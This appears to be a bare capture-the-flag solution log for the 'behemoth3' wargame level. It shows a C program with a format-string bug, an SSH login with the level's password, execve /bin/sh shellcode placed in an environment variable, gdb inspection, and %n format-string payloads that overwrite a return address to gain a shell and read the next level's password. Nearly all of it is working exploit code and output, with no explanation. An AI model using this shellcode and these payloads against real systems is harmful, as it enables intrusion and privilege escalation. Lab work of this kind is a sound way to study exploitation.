behemoth - 03
#include <stdio.h>int main(int argc, char *argv[]){char buf[200];printf("Identify yourself: ");fgets(buf, 200, stdin);printf("Welcome, ");printf(buf);puts("\naaaand goodbye again.");return 0;}
root@today:~# ssh behemoth3@178.79.134.250
behemoth3@178.79.134.250's password: nieteidiel
behemoth3@melinda:~$ cd /behemoth
behemoth3@melinda:/behemoth$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')
behemoth3@melinda:/behemoth$ /tmp/shui3/env EGG ./behemoth3
0xffffd8ab
behemoth3@melinda:/behemoth$ gdb -tui behemoth3
(gdb) b main
(gdb) layout asm
(gdb) run
(gdb) i r esp
esp 0xffffd5b8 0xffffd5b8
(gdb)
behemoth3@melinda:/behemoth$ (python -c 'print "\xbc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, 锟斤拷锟斤拷 200
aaaand goodbye again.
behemoth3@melinda:/behemoth$ (python -c 'print "\xcc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, 锟斤拷锟斤拷 200
aaaand goodbye again.
behemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3
Identify yourself: Welcome, 锟斤拷锟斤拷 200
aaaand goodbye again.
Segmentation fault
behemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff\xde\xd5\xff\xff" + "%55459x%6$n%10068x%7$n"' ; cat) | ./behemoth3
Identify yourself: Welcome, 锟斤拷锟斤拷锟斤拷锟斤拷 c8 f7fcbc20
aaaand goodbye again.
whoami
behemoth4
cat /etc/behemoth_pass/behemoth4
ietheishei
^C
┌─────────────────────────────────────────────────────────────────────────────────┐
│0x804847d <main> push %ebp │
│0x804847e <main+1> mov %esp,%ebp │
│0x8048480 <main+3> and $0xfffffff0,%esp │
│0x8048483 <main+6> sub $0xe0,%esp │
│0x8048489 <main+12> movl $0x8048570,(%esp) │
│0x8048490 <main+19> call 0x8048330 <printf@plt> │
│0x8048495 <main+24> mov 0x80497a4,%eax │
│0x804849a <main+29> mov %eax,0x8(%esp) │
│0x804849e <main+33> movl $0xc8,0x4(%esp) │
│0x80484a6 <main+41> lea 0x18(%esp),%eax │
│0x80484aa <main+45> mov %eax,(%esp) │
│0x80484ad <main+48> call 0x8048340 <fgets@plt> │
│0x80484b2 <main+53> movl $0x8048584,(%esp) │
│0x80484b9 <main+60> call 0x8048330 <printf@plt> │
│0x80484be <main+65> lea 0x18(%esp),%eax │
│0x80484c2 <main+69> mov %eax,(%esp) │
│0x80484c5 <main+72> call 0x8048330 <printf@plt> │
│0x80484ca <main+77> movl $0x804858e,(%esp) │
│0x80484d1 <main+84> call 0x8048350 <puts@plt> │
│0x80484d6 <main+89> mov $0x0,%eax │
│0x80484db <main+94> leave │
│0x80484dc <main+95> ret │
└─────────────────────────────────────────────────────────────────────────────────┘